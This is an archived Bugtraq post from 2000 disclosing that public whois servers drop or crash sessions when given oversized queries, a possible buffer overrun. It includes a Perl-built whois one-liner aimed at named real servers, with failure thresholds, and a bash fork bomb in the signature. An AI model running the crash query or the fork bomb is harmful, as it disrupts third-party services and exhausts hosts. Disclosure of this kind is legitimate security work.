Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

no comment

From: lcamtuf () DIONE IDS PL (Michal Zalewski)
Date: Wed, 2 Feb 2000 13:29:07 +0100

In following example (which works only with Linux version of 'whois'
command - *BSD version has built-in query size limits), replace
joshua.ripe.net with your favourite - whois.arin.net or whois.radb.net...

[lcamtuf@www lcamtuf]$ whois `perl -e '{print "0." x 10000}'`@joshua.ripe.net
[joshua.ripe.net]

% Rights restricted by copyright. See http://www.ripe.net/ripencc/pub-services/db/copyright.html
% No entries found for the selected source(s).
%
% If you would like to search on arbitrary strings,
% please see the Database page on the RIPE NCC
% web-site at http://www.ripe.net/ripencc/pub-services/db/
% This will only work for RIPE data.
%
% Please note that RIPE whoisd service temporarily
% does not mirror RADB and CW databases. Please query
% these databases directly at:
% whois.radb.net for RADB and
% whois.cw.net for CW.

[lcamtuf@www lcamtuf]$ whois `perl -e '{print "0." x 20000}'`@joshua.ripe.net
[joshua.ripe.net]

% Rights restricted by copyright. See http://www.ripe.net/ripencc/pub-services/db/copyright.html

[lcamtuf@www lcamtuf]$

For whois.arin.net and whois.radb.net, the 'magic point' is at about 248
bytes of query sent. whois.ripe.net seems to panic with buffer larger than
30k, but only with specific sequences (like "0.0.0"...). whois.cw.net can
stand even 80-90kB before crashing sessions.

I have no idea how to explain it - seems just like regular buffer overrun
in whoisd started from inetd (as it is suggested). But, of course, we
can't get sources of currently running services, it couls be addressed as
"silent dropping excessive data portions with system-dependent data amount
limit". Only one thing is mysterious - whoisd service producess verbose
output on any query syntax error or any other problem, except for that.
And RFC don't mention maximal query length nor _any_ situation when
connection should be silently dropped.  That's another reason to think
whoisd crashed.

_______________________________________________________
Michal Zalewski * [lcamtuf () ags pl] <=> [AGS WAN SYSADM]
[dione.ids.pl SYSADM] <-> [http://lcamtuf.na.export.pl]
[+48 22 813 25 86] [+48 603 110 160] bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=
Previous By Date Next
Previous By Thread Next

Current thread: